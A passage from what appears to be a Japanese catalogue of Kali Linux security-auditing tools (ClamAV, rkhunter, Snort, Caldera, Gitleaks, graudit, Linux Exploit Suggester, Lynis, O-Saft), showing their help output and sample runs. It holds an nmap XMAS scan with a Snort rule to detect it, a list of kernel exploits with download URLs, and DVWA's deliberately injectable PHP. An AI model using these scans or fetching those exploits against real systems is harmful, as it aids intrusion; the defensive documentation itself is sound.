/var/www/html/mirai: Unix.Trojan.Mirai-7100807-0 FOUND
----------- SCAN SUMMARY -----------
Infected files: 1
Time: 25.322 sec (0 m 25 s)
Start Date: 2024:12:06 02:45:55
End Date: 2024:12:06 02:46:20
# 1回目のスキャンでキャッシュが有効になるため2回目はスキャン速度が速い
root@kali:~# clamdscan --config-file /etc/clamav/clamd.conf /var/www/html
/var/www/html/mirai: Unix.Trojan.Mirai-7100807-0 FOUND
----------- SCAN SUMMARY -----------
Infected files: 1
Time: 1.480 sec (0 m 1 s)
Start Date: 2024:12:06 02:49:18
End Date: 2024:12:06 02:49:19
RootKit Hunter
システムをスキャンして既知および未知のルートキット、バックドア、スニッファー、エクスプロイトを検出します。
■ 使用方法
root@kali:~# rkhunter --help
Usage: rkhunter {--check | --unlock | --update | --versioncheck |
--propupd [{filename | directory | package name},...] |
--list [{tests | {lang | languages} | rootkits | perl | propfiles}] |
--config-check | --version | --help} [options]
Current options are:
--append-log Append to the logfile, do not overwrite
--bindir <directory>... Use the specified command directories
-c, --check Check the local system
-C, --config-check Check the configuration file(s), then exit
--cs2, --color-set2 Use the second color set for output
--configfile <file> Use the specified configuration file
--cronjob Run as a cron job
(implies -c, --sk and --nocolors options)
--dbdir <directory> Use the specified database directory
--debug Debug mode
(Do not use unless asked to do so)
--disable <test>[,<test>...] Disable specific tests
(Default is to disable no tests)
--display-logfile Display the logfile at the end
--enable <test>[,<test>...] Enable specific tests
(Default is to enable all tests)
--hash {MD5 | SHA1 | SHA224 | SHA256 | SHA384 | SHA512 |
NONE | <command>} Use the specified file hash function
(Default is SHA256)
-h, --help Display this help menu, then exit
--lang, --language <language> Specify the language to use
(Default is English)
--list [tests | languages | List the available test names, languages,
rootkits | perl | rootkit names, perl module status
propfiles] or file properties database, then exit
-l, --logfile [file] Write to a logfile
(Default is /var/log/rkhunter.log)
--noappend-log Do not append to the logfile, overwrite it
--nocf Do not use the configuration file entries
for disabled tests (only valid with --disable)
--nocolors Use black and white output
--nolog Do not write to a logfile
--nomow, --no-mail-on-warning Do not send a message if warnings occur
--ns, --nosummary Do not show the summary of check results
--novl, --no-verbose-logging No verbose logging
--pkgmgr {RPM | DPKG | BSD | Use the specified package manager to obtain
BSDng | SOLARIS | or verify file property values.
NONE} (Default is NONE)
--propupd [file | directory | Update the entire file properties database,
package]... or just for the specified entries
-q, --quiet Quiet mode (no output at all)
--rwo, --report-warnings-only Show only warning messages
--sk, --skip-keypress Don\'t wait for a keypress after each test
--summary Show the summary of system check results
(This is the default)
--syslog [facility.priority] Log the check start and finish times to syslog
(Default level is authpriv.notice)
--tmpdir <directory> Use the specified temporary directory
--unlock Unlock (remove) the lock file
--update Check for updates to database files
--vl, --verbose-logging Use verbose logging (on by default)
-V, --version Display the version number, then exit
--versioncheck Check for latest version of program
-x, --autox Automatically detect if X is in use
-X, --no-autox Do not automatically detect if X is in use
■ 使用例
root@kali:~# rkhunter -c
[ Rootkit Hunter version 1.4.6 ]
Checking system commands...
Performing 'strings' command checks
Checking 'strings' command [ OK ]
Performing 'shared libraries' checks
Checking for preloading variables [ None found ]
Checking for preloaded libraries [ None found ]
Checking LD_LIBRARY_PATH variable [ Not found ]
Performing file properties checks
Checking for prerequisites [ OK ]
/usr/sbin/adduser [ OK ]
/usr/sbin/chroot [ OK ]
/usr/sbin/fsck [ OK ]
/usr/sbin/groupadd [ OK ]
/usr/sbin/groupdel [ OK ]
[...]
Checking for rootkits...
Performing check of known rootkit files and directories
55808 Trojan - Variant A [ Not found ]
ADM Worm [ Not found ]
AjaKit Rootkit [ Not found ]
Adore Rootkit [ Not found ]
aPa Kit [ Not found ]
Apache Worm [ Not found ]
Ambient (ark) Rootkit [ Not found ]
Balaur Rootkit [ Not found ]
[...]
Checking the network...
Performing checks on the network ports
Checking for backdoor ports [ None found ]
Performing checks on the network interfaces
Checking for promiscuous interfaces [ None found ]
Checking the local host...
Performing system boot checks
Checking for local host name [ Found ]
Checking for system startup files [ Found ]
Checking system startup files for malware [ None found ]
Performing group and account checks
Checking for passwd file [ Found ]
Checking for root equivalent (UID 0) accounts [ None found ]
[...]
System checks summary
=====================
File properties checks...
Files checked: 123
Suspect files: 0
Rootkit checks...
Rootkits checked : 474
Possible rootkits: 0
Snort
ネットワーク侵入検知システムです。悪意のあるネットワークアクティビティを定義したルールに一致するパケットを検出し、アラートを生成します。
■ 使用方法
root@kali:~# snort --help-options
-? <option prefix> output matching command line option quick help (same as --help-options) (optional)
-A <mode> set alert mode: none, cmg, or alert_*
-B <mask> obfuscated IP addresses in alerts and packet dumps using CIDR mask
-C print out payloads with character data only (no hex)
-c <conf> use this configuration
-D run Snort in background (daemon) mode
-d dump the Application Layer
-e display the second layer header info
-f turn off fflush() calls after binary log writes
-G <0xid> (same as --logid) (0:65535)
-g <gname> run snort gid as <gname> group (or gid) after initialization
-H make hash tables deterministic
-h show help overview (same as --help)
-i <iface>... list of interfaces
-k <mode> checksum mode; default is all (all|noip|notcp|noudp|noicmp|none)
-L <mode> logging mode (none, dump, pcap, or log_*)
-l <logdir> log to this directory instead of current directory
-M log messages to syslog (not alerts)
-m <umask> set the process file mode creation mask (0x000:0x1FF)
-n <count> stop after count packets (0:max53)
-O obfuscate the logged IP addresses
-Q enable inline mode operation
-q quiet mode - suppress normal logging on stdout
-R <rules> include this rules file in the default policy
-r <pcap>... (same as --pcap-list)
-s <snap> (same as --snaplen); default is 1518 (0:65535)
-T test and report on the current Snort configuration
-t <dir> chroots process to <dir> after initialization
-U use UTC for timestamps
-u <uname> run snort as <uname> or <uid> after initialization
-V (same as --version)
-v be verbose
-X dump the raw packet data starting at the link layer
-x same as --pedantic
-y include year in timestamp in the alert and log files
-z <count> maximum number of packet threads (same as --max-packet-threads); 0 gets the number of CPU cores reported by the system; default is 1 (0:max32)
--alert-before-pass evaluate alert rules before pass rules; default is pass rules first
--bpf <filter options> are standard BPF options, as seen in TCPDump
--c2x output hex for given char (see also --x2c)
--create-pidfile create PID file, even when not in Daemon mode
--daq <type> select packet acquisition module (default is pcap)
--daq-batch-size <size> set the DAQ receive batch size; default is 64 (1:)
--daq-dir <dir> tell snort where to find desired DAQ
--daq-list list packet acquisition modules available in optional dir, default is static modules only
--daq-mode <mode> select DAQ module operating mode (overrides automatic selection) (passive | inline | read-file)
--daq-var <name=value> specify extra DAQ configuration variable
--dirty-pig don\'t flush packets on shutdown
--dump-builtin-options additional options to include with --dump-builtin-rules stubs
--dump-builtin-rules [<module prefix>] output stub rules for selected modules (optional)
--dump-config dump config in json format (all | top)
--dump-config-text dump config in text format
--dump-dynamic-rules output stub rules for all loaded rules libraries
--dump-defaults [<module prefix>] output module defaults in Lua format (optional)
--dump-rule-deps dump rule dependencies in json format for use by other tools
--dump-rule-meta dump configured rule info in json format for use by other tools
--dump-rule-state dump configured rule state in json format for use by other tools
--dump-version output the version, the whole version, and only the version
--enable-inline-test enable Inline-Test Mode Operation
--enable-test-features enable features used in testing
--gen-msg-map dump configured rules in gen-msg.map format for use by other tools
--help show help overview
--help-commands [<module prefix>] output matching commands (optional)
--help-config [<module prefix>] output matching config options (optional)
--help-counts [<module prefix>] output matching peg counts (optional)
--help-limits print the int upper bounds denoted by max*
--help-module <module> output description of given module
--help-modules list all available modules with brief help
--help-modules-json dump description of all available modules in JSON format
--help-options [<option prefix>] output matching command line option quick help (same as -?) (optional)
--help-plugins list all available plugins with brief help
--help-signals dump available control signals
--id-offset offset to add to instance IDs when logging to files (0:65535)
--id-subdir create/use instance subdirectories in logdir instead of instance filename prefix
--id-zero use id prefix / subdirectory even with one packet thread
--include-path <path> where to find Lua and rule included files; searched before current or config directories
--list-buffers output available inspection buffers
--list-builtin [<module prefix>] output matching builtin rules (optional)
--list-gids [<module prefix>] output matching generators (optional)
--list-modules [<module type>] list all known modules of given type (optional)
--list-plugins list all known plugins
--lua <chunk> extend/override conf with chunk; may be repeated
--lua-sandbox <file> file that contains the lua sandbox environment in which config will be loaded
--logid <0xid> log Identifier to uniquely id events for multiple snorts (same as -G) (0:65535)
--markup output help in asciidoc compatible format
--max-packet-threads <count> configure maximum number of packet threads (same as -z) (0:max32)
--mem-check like -T but also compile search engines
--metadata-filter <filter> load only rules containing filter string in metadata if set
--nostamps don\'t include timestamps in log file names
--nolock-pidfile do not try to lock Snort PID file
--no-warn-flowbits ignore warnings about flowbits that are checked but not set and vice-versa
--no-warn-rules ignore warnings about duplicate rules and rule parsing issues
--pause wait for resume/quit command before processing packets/terminating
--pcap-file <file> file that contains a list of pcaps to read - read mode is implied
--pcap-list <list> a space separated list of pcaps to read - read mode is implied
--pcap-dir <dir> a directory to recurse to look for pcaps - read mode is implied
--pcap-filter <filter> filter to apply when getting pcaps from file or directory
--pcap-loop <count> read all pcaps <count> times; 0 will read until Snort is terminated (0:max32)
--pcap-no-filter reset to use no filter when getting pcaps from file or directory
--pcap-show print a line saying what pcap is currently being read
--pedantic warnings are fatal
--plugin-path <path> a colon separated list of directories or plugin libraries
--process-all-events process all action groups
--rule <rules> to be added to configuration; may be repeated
--rule-path <path> where to find rules files
--rule-to-hex output so rule header to stdout for text rule on stdin
--rule-to-text output plain so rule header to stdout for text rule on stdin (specify delimiter or [Snort_SO_Rule] will be used) (16)
--run-prefix <pfx> prepend this to each output file
--script-path <path> to a luajit script or directory containing luajit scripts
--show-file-codes indicate how files are located: A=absolute and W, F, C which are relative to the working directory, including file, and config file respectively
--show-plugins list module and plugin versions
--skip <n> skip 1st n packets (0:max53)
--snaplen <snap> set snaplen of packet (same as -s) (0:65535)
--stdin-rules read rules from stdin until EOF or a line starting with END is read
--talos enable Talos tweak (same as --tweaks talos)
--tweaks tune configuration
--version show version number (same as -V)
--warn-all enable all warnings
--warn-conf warn about configuration issues
--warn-conf-strict warn about unrecognized elements in configuration files
--warn-daq warn about DAQ issues, usually related to mode
--warn-flowbits warn about flowbits that are checked but not set and vice-versa
--warn-hosts warn about host table issues
--warn-plugins warn about issues that prevent plugins from loading
--warn-rules warn about duplicate rules and rule parsing issues
--warn-scripts warn about issues discovered while processing Lua scripts
--warn-symbols warn about unknown symbols in your Lua config
--warn-vars warn about variable definition and usage issues
--x2c output ASCII char for given hex (see also --c2x) (0x00:0xFF)
--x2s output ASCII string for given byte code (see also --x2c)
■ 使用例
# XMASスキャンを検知するルールを作成
root@kali_1:~# echo "alert tcp \$EXTERNAL_NET any -> \$HOME_NET any (msg:\"SCAN nmap XMAS\"; flow:stateless; flags:UPF; classtype:attempted-recon; sid:1000001; rev:1;)" > scan.rules
# ホスト1でSnortを起動
root@kali_1:~# snort -c /etc/snort/snort.lua -i eth0 -A alert_fast -R scan.rules
Loading /etc/snort/snort.lua:
Loading snort_defaults.lua:
Finished snort_defaults.lua:
[...]
pcap DAQ configured to passive.
Commencing packet processing
++ [0] eth0
# ホスト1に対してXMASスキャンを実行
root@kali_2:~# nmap -sX 192.168.11.3
# アラートが表示される
root@kali_1:~# snort -c /etc/snort/snort.lua -i eth0 -A alert_fast -R scan.rules
++ [0] eth0
11/15-11:43:09.192994 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:993
11/15-11:43:09.193109 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:139
11/15-11:43:09.193141 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:3389
11/15-11:43:09.193170 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:25
11/15-11:43:09.193198 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:23
[...]
YARA
テキストやバイナリデータのパターンなどを定義したルールをもとにマルウェアや潜在的な危険性のあるファイルの識別と分類を行います。
■ 使用方法
root@kali:~# yara --help
Usage: yara [OPTION]... [NAMESPACE:]RULES_FILE... FILE | DIR | PID
--atom-quality-table=FILE path to a file with the atom quality table
-C, --compiled-rules load compiled rules
-c, --count print only number of matches
-E, --strict-escape warn on unknown escape sequences
-d, --define=VAR=VALUE define external variable
-q, --disable-console-logs disable printing console log messages
--fail-on-warnings fail on warnings
-f, --fast-scan fast matching mode
-h, --help show this help and exit
-i, --identifier=IDENTIFIER print only rules named IDENTIFIER
--max-process-memory-chunk=NUMBER set maximum chunk size while reading process memory (default=1073741824)
-l, --max-rules=NUMBER abort scanning after matching a NUMBER of rules
--max-strings-per-rule=NUMBER set maximum number of strings per rule (default=10000)
-x, --module-data=MODULE=FILE pass FILE\'s content as extra data to MODULE
-n, --negate print only not satisfied rules (negate)
-N, --no-follow-symlinks do not follow symlinks when scanning
-w, --no-warnings disable warnings
-m, --print-meta print metadata
-D, --print-module-data print module data
-M, --module-names show module names
-e, --print-namespace print rules\' namespace
-S, --print-stats print rules\' statistics
-s, --print-strings print matching strings
-L, --print-string-length print length of matched strings
-X, --print-xor-key print xor key and plaintext of matched strings
-g, --print-tags print tags
-r, --recursive recursively search directories
--scan-list scan files listed in FILE, one per line
-z, --skip-larger=NUMBER skip files larger than the given size when scanning a directory
-k, --stack-size=SLOTS set maximum stack size (default=16384)
-t, --tag=TAG print only rules tagged as TAG
-p, --threads=NUMBER use the specified NUMBER of threads to scan a directory
-a, --timeout=SECONDS abort scanning after the given number of SECONDS
-v, --version show version information
■ 使用例
YARAの使用例は弊社のブログ記事をご参照ください。
Security Auditing
MITRE Caldera
対象となるホスト・ネットワークでMITRE ATT&CK TTPをエミュレーションし、組織に対する脅威を検出および分析します。TTPを実行するエージェントとエージェントを管理するサーバーで構成され、操作はGUIを通して行います。
■ 使用方法
root@kali:~# caldera --help
usage: Welcome to the system [-h] [-E ENVIRONMENT] [-l {DEBUG,INFO,WARNING,ERROR,CRITICAL}] [--fresh] [-P PLUGINS]
[--insecure]
options:
-h, --help show this help message and exit
-E ENVIRONMENT, --environment ENVIRONMENT
Select an env. file to use
-l {DEBUG,INFO,WARNING,ERROR,CRITICAL}, --log {DEBUG,INFO,WARNING,ERROR,CRITICAL}
Set the logging level
--fresh remove object_store on start
-P PLUGINS, --plugins PLUGINS
Start up with a single plugin
--insecure Start caldera with insecure default config values. Equivalent to "-E default".
■ 使用例
root@kali:~# caldera
2024-09-19 05:53:28 - INFO (server.py:125 <module>) Using main config from conf/local.yml
2024-09-19 05:53:29 - INFO (contact_gist.py:70 start) Invalid Github Gist personal API token provided. Gist C2 contact will not be started.
2024-09-19 05:53:29 - INFO (tunnel_ssh.py:26 start) Generating temporary SSH private key. Was unable to use provided SSH private key
2024-09-19 05:53:29 - INFO (app_svc.py:116 load) Enabled plugin: training
2024-09-19 05:53:29 - INFO (app_svc.py:116 load) Enabled plugin: access
2024-09-19 05:53:29 - INFO (app_svc.py:116 load) Enabled plugin: response
2024-09-19 05:53:29 - INFO (app_svc.py:116 load) Enabled plugin: fieldmanual
2024-09-19 05:53:29 - INFO (app_svc.py:116 load) Enabled plugin: manx
2024-09-19 05:53:29 - INFO (app_svc.py:116 load) Enabled plugin: stockpile
2024-09-19 05:53:30 - INFO (app_svc.py:116 load) Enabled plugin: sandcat
2024-09-19 05:53:30 - INFO (app_svc.py:116 load) Enabled plugin: compass
2024-09-19 05:53:30 - INFO (app_svc.py:116 load) Enabled plugin: atomic
2024-09-19 05:53:30 - INFO (app_svc.py:116 load) Enabled plugin: debrief
2024-09-19 05:53:30 - INFO (logging.py:102 log) Creating SSH listener on 0.0.0.0, port 8022
2024-09-19 05:53:30 - INFO (server.py:751 start) serving on 0.0.0.0:2222
[...]
エージェントで実行可能なビルトインATT&CK 戦術/テクニックの一覧
ATT&CK 戦術/テクニックをテーマに沿ってグループ化したビルトイン・プロファイルの一覧
プロファイルを選択して実行した結果
DefectDojo
ソフトウェア開発ライフサイクル全体にわたってセキュリティツールを統合し、複数のソースからのセキュリティデータをもとにセキュリティ問題を関連付け、優先順位付けすることで、アプリケーションのリスクを継続的に管理します。
■ 使用方法
公式ガイドをご参照ください。
■ 使用例
DefectDojoの使用例は弊社のブログ記事をご参照ください。
Gitleaks
スースコードにハードコーディングされたパスワードやAPIキーなどのクレデンシャル情報を検知します。
■ 使用方法
root@kali:~# gitleaks --help
Usage:
gitleaks [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
detect detect secrets in code
help Help about any command
protect protect secrets in code
version display gitleaks version
Flags:
-b, --baseline-path string path to baseline with issues that can be ignored
-c, --config string config file path
order of precedence:
1. --config/-c
2. env var GITLEAKS_CONFIG
3. (--source/-s)/.gitleaks.toml
If none of the three options are used, then gitleaks will use the default config
--exit-code int exit code when leaks have been encountered (default 1)
-h, --help help for gitleaks
-l, --log-level string log level (trace, debug, info, warn, error, fatal) (default "info")
--max-target-megabytes int files larger than this will be skipped
--no-banner suppress banner
--redact redact secrets from logs and stdout
-f, --report-format string output format (json, csv, sarif) (default "json")
-r, --report-path string report file
-s, --source string path to source (default: $PWD) (default ".")
-v, --verbose show verbose output from scan
■ 使用方法
root@kali:~# gitleaks --help
Gitleaks scans code, past or present, for secrets
Usage:
gitleaks [command]
Available Commands:
completion generate the autocompletion script for the specified shell
dir scan directories or files for secrets
git scan git repositories for secrets
help Help about any command
stdin detect secrets from stdin
version display gitleaks version
Flags:
-b, --baseline-path string path to baseline with issues that can be ignored
-c, --config string config file path
order of precedence:
1. --config/-c
2. env var GITLEAKS_CONFIG
3. (target path)/.gitleaks.toml
If none of the three options are used, then gitleaks will use the default config
--enable-rule strings only enable specific rules by id
--exit-code int exit code when leaks have been encountered (default 1)
-i, --gitleaks-ignore-path string path to .gitleaksignore file or folder containing one (default ".")
-h, --help help for gitleaks
--ignore-gitleaks-allow ignore gitleaks:allow comments
-l, --log-level string log level (trace, debug, info, warn, error, fatal) (default "info")
--max-decode-depth int allow recursive decoding up to this depth (default "0", no decoding is done)
--max-target-megabytes int files larger than this will be skipped
--no-banner suppress banner
--no-color turn off color for verbose output
--redact uint[=100] redact secrets from logs and stdout. To redact only parts of the secret just apply a percent value from 0..100. For example --redact=20 (default 100%)
-f, --report-format string output format (json, csv, junit, sarif) (default "json")
-r, --report-path string report file
-v, --verbose show verbose output from scan
--version version for gitleaks
■ 使用例
root@kali:~# gitleaks -v --enable-rule generic-api-key dir
[...]
Finding: 'authentication_key' => 'abcxyzABCXYZ123098'
Secret: abcxyzABCXYZ123098
RuleID: generic-api-key
Entropy: 4.169925
File: tests/Eccube/Tests/Web/Admin/Store/PluginControllerTest.php
Line: 36
Fingerprint: tests/Eccube/Tests/Web/Admin/Store/PluginControllerTest.php:generic-api-key:36
4:05AM INF scan completed in 2.4s
4:05AM WRN leaks found: 1
graudit
ソースコードの静的解析を行い潜在的な脆弱性を発見します。C、Go、Java、JavaScript、Perl、PHP、Ruby、Scala、SQL、TypeScriptなどの言語に対応しています。
■ 使用方法
root@kali:~# graudit -h
Usage: graudit [opts] /path/to/scan
OPTIONS
-d <dbname> database to use or /path/to/file.db (uses default if not specified)
-A scan unwanted and difficult (ALL) files
-x exclude these files (comma separated list: -x *.js,*.sql)
-i case in-sensitive scan
-c <num> number of lines of context to display, default is 2
-B supress banner
-L vim friendly lines
-b colour blind friendly template
-z supress colors
-Z high contrast colors
-l lists databases available
-v prints version number
-h prints this help screen
■ 使用例
root@kali:~# graudit -x *.js .
./csrf/test_credentials.php-20-
./csrf/test_credentials.php:21: $query = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
./csrf/test_credentials.php:22: $result = @mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>'. mysqli_connect_error() . '.<br />Try <a href="setup.php">installing again</a>.</pre>' );
./csrf/test_credentials.php-23- if( $result && mysqli_num_rows( $result ) == 1 ) { // Login Successful...
##############################################
./csrf/source/medium.php-17- $current_user = dvwaCurrentUser();
./csrf/source/medium.php:18: $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . $current_user . "';";
./csrf/source/medium.php:19: $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
[...]
./exec/source/impossible.php-25- // *nix
./exec/source/impossible.php:26: $cmd = shell_exec( 'ping -c 4 ' . $target );
./exec/source/impossible.php-27- }
##############################################
./view_help.php-19- if ($locale == 'en') {
./view_help.php:20: eval( '?>' . file_get_contents( DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/{$id}/help/help.php" ) . '<?php ' );
./view_help.php-21- } else {
./view_help.php:22: eval( '?>' . file_get_contents( DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/{$id}/help/help.{$locale}.php" ) . '<?php ' );
./view_help.php-23- }
##############################################
LES(Linux privilege escalation auditing tool)
使用しているLinuxカーネルバージョンの既知の脆弱性情報の提供およびセキュリティ設定の検証を行います。
■ 使用例
root@kali:~# ./linux-exploit-suggester.sh
Available information:
Kernel version: 5.15.167.4
Architecture: x86_64
Distribution: N/A
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: N/A
Searching among:
81 kernel space exploits
0 user space exploits
Possible Exploits:
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: less probable
Tags: ubuntu=(20.04|21.04),debian=11
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
root@kali:~# ./linux-exploit-suggester.sh --checksec
Mainline kernel protection mechanisms:
[ Disabled ] Kernel Page Table Isolation (PTI) support
https://github.com/mzet-/les-res/blob/master/features/pti.md
[ Enabled ] GCC stack protector support (CONFIG_HAVE_STACKPROTECTOR)
https://github.com/mzet-/les-res/blob/master/features/stackprotector-regular.md
[ Enabled ] GCC stack protector STRONG support (CONFIG_STACKPROTECTOR_STRONG)
https://github.com/mzet-/les-res/blob/master/features/stackprotector-strong.md
[ Enabled ] Low address space to protect from user allocation (CONFIG_DEFAULT_MMAP_MIN_ADDR)
https://github.com/mzet-/les-res/blob/master/features/mmap_min_addr.md
[ Disabled ] Prevent users from using ptrace to examine the memory and state of their processes (CONFIG_SECURITY_YAMA)
https://github.com/mzet-/les-res/blob/master/features/yama_ptrace_scope.md
[ Disabled ] Restrict unprivileged access to kernel syslog (CONFIG_SECURITY_DMESG_RESTRICT)
https://github.com/mzet-/les-res/blob/master/features/dmesg_restrict.md
[ Enabled ] Randomize the address of the kernel image (KASLR) (CONFIG_RANDOMIZE_BASE)
https://github.com/mzet-/les-res/blob/master/features/kaslr.md
[...]
Lynis
Linux、macOS、UNIXベースのシステムのセキュリティスキャンを行い、脆弱なソフトウェアパッケージ、可能性のある設定上の問題、システムを強化するためのヒントなどの情報を提供します。
■ 使用方法
root@kali:~# lynis --help
Usage: lynis command [options]
Command:
audit
audit system : Perform local security scan
audit system remote <host> : Remote security scan
audit dockerfile <file> : Analyze Dockerfile
show
show : Show all commands
show version : Show Lynis version
show help : Show help
update
update info : Show update details
Options:
Alternative system audit modes
--forensics : Perform forensics on a running or mounted system
--pentest : Non-privileged, show points of interest for pentesting
Layout options
--no-colors : Don\'t use colors in output
--quiet (-q) : No output
--reverse-colors : Optimize color display for light backgrounds
--reverse-colours : Optimize colour display for light backgrounds
Misc options
--debug : Debug logging to screen
--no-log : Don\'t create a log file
--profile <profile> : Scan the system with the given profile file
--view-manpage (--man) : View man page
--verbose : Show more details on screen
--version (-V) : Display version number and quit
--wait : Wait between a set of tests
--slow-warning <seconds> : Threshold for slow test warning in seconds (default 10)
Enterprise options
--plugindir <path> : Define path of available plugins
--upload : Upload data to central node
■ 使用例
root@kali:~# lynis audit system
[+] Initializing program
------------------------------------
- Detecting OS... [ DONE ]
- Checking profiles... [ DONE ]
[...]
-[ Lynis 3.1.1 Results ]-
Warnings (8):
----------------------------
! Reboot of system is most likely needed [KRNL-5830]
- Solution : reboot
https://cisofy.com/lynis/controls/KRNL-5830/
! Couldn\'t find 2 responsive nameservers [NETW-2705]
https://cisofy.com/lynis/controls/NETW-2705/
! Found some information disclosure in SMTP banner (OS or software name) [MAIL-8818]
https://cisofy.com/lynis/controls/MAIL-8818/
! iptables module(s) loaded, but no rules active [FIRE-4512]
https://cisofy.com/lynis/controls/FIRE-4512/
! Found easy guessable SNMP community string [SNMP-3306]
https://cisofy.com/lynis/controls/SNMP-3306/
[...]
Suggestions (55):
----------------------------
* Set a password on GRUB boot loader to prevent altering boot configuration (e.g. boot in single user mode without password) [BOOT-5122]
- Related resources
* Website: https://cisofy.com/lynis/controls/BOOT-5122/
* Determine runlevel and services at startup [BOOT-5180]
- Related resources
* Website: https://cisofy.com/lynis/controls/BOOT-5180/
* If not required, consider explicit disabling of core dump in /etc/security/limits.conf file [KRNL-5820]
- Related resources
* Website: https://cisofy.com/lynis/controls/KRNL-5820/
[...]
OWASP O-Saft
SSL証明書に関する情報を表示し、与えられた暗号のリストと様々なSSL設定に従ってSSL接続をテストします。
■ 使用方法
root@kali:~# o-saft --help=options
Options for all commands (general)
--dns
Do DNS lookups to map given hostname to IP, do a reverse lookup.
--no-dns
Do not make DNS lookups.
Note that the corresponding IP and reverse hostname may be missing
in some messages then.
--host=HOST
Specify HOST as target to be checked. Legacy option.
--port=PORT
Specify PORT of target to be used. Legacy option.
--host=HOST --port=PORT HOST:PORT HOST
When giving more than one HOST argument, the sequence of the given
HOST argument and the given --port=PORT and the given --host=HOST
options are important.
The rule how ports and hosts are mapped is as follows:
* HOST:PORT arguments are used as is (connection to HOST on PORT)
* only HOST is given, then previous specified PORT is used
Note that URLs are treated as HOST:PORT, if they contain a port.
Example:
o-saft.pl +cmd host-1 --port 23 host-2 host-3:42 host-4
will connect to:
* host-1:443
* host-2:23
* host-3:42
* host-4:23
--proxyhost=PROXYHOST --proxy=PROXYHOST:PROXYPORT
Make all connection to target using PROXYHOST.
Also possible is: --proxy=PROXYUSER:PROXYPASS@PROXYHOST:PROXYPORT
--proxyport=PROXYPORT
Make all connection to target using PROXYHOST:PROXYPORT.
--proxyuser=PROXYUSER
Specify username for proxy authentication.
--proxypass=PROXYPASS
Specify password for proxy authentication.
--starttls
Use 'STARTTLS' command to start a TLS connection via SMTP.
This option is a shortcut for --starttls=SMTP .
--starttls=SMTP
--starttls=PROT
Use 'STARTTLS' command to start a TLS connection via protocol.
'PROT' may be any of: 'SMTP', 'IMAP', 'IMAP2', 'POP3', 'FTPS',
'RDP', 'LDAP' or 'XMPP' .
For --starttls=SMTP see --dns-mx also to use MX records instead
of host
--starttls-delay=SEC
Number of seconds to wait before sending a packet, to slow down the
'STARTTLS' requests. Default is 0.
This may prevent blocking of requests by the target due to too much
or too fast connections.
Note: In this case there is an automatic suspension and retry with
a longer delay.
--cgi
--cgi-exec
Internal use for CGI mode only.
Options for SSL tool
--rc
Read RC-FILE if exists, from directory where program was found.
--no-rc
Do not read RC-FILE.
--exitcode
The exit status code will be greater 0, if any of following applies:
* any check returns 'no', except if 'no (<<...>>)'
* insecure protocols are available
* insecure ciphers are supported
* ciphers without PFS are supported, disable with --exitcode-cipher
In particular, the status code will be the total count of all these
checks. The status code will also be printed at end, like:
# EXIT 23
Parts of these checks can be diasabled, see --exitcode-* options
below.
Use --v or --exitcode-v to see details about the performed checks.
Functionality implemented experimental, may change in future.
--exitcode-v
Print information about performed checks.
--exitcode-quiet
Do not print status code at end, like '# EXIT 23'.
--exitcode-no-checks
Do not count checks with result 'no' for --exitcode .
--exitcode-no-low --exitcode-no-weak --exitcode-no-medium
Do not count LOW, WEAK or MEDIUM security ciphers for --exitcode .
--exitcode-no-ciphers
Do not count any ciphers for --exitcode .
--exitcode-no-pfs
Do not count ciphers without PFS for --exitcode .
--openssl-s_client --s_client
Use "openssl s_slient ..." call to retrieve more information from
the SSL connection. This is disabled by default on Windows because
of performance problems. Without this option (default on Windows !)
following information are missing:
compression, expansion, renegotiation, resumption,
selfsigned, verify, chain, protocols, DH parameters
See "Net::SSLinfo" for details.
If used together with --trace, s_client data will also be printed
in debug output of "Net::SSLinfo".
--no-openssl
Do not use external "openssl" tool to retrieve information. Use of
"openssl" is disabled by default on Windows.
Note that this results in some missing information, see above.
--openssl=TOOL
